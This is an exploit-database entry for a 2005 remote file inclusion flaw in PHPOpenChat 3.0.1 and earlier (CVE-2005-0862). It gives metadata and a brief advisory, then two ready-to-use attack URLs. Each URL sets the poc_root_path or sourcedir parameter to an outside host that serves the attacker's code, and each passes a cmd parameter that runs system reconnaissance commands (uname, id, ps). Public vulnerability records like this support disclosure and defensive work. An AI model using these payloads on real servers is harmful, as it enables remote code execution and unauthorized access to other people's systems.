[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion

Author: Albania Security Clan
type: webapps
platform: php
port: 
date_added: 2005-03-15 
date_updated: 2013-05-06 
verified: 1 
codes: CVE-2005-0862;OSVDB-14809 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/12817/info

PHPOpenChat is prone to multiple remote file-include vulnerabilities.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.

http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.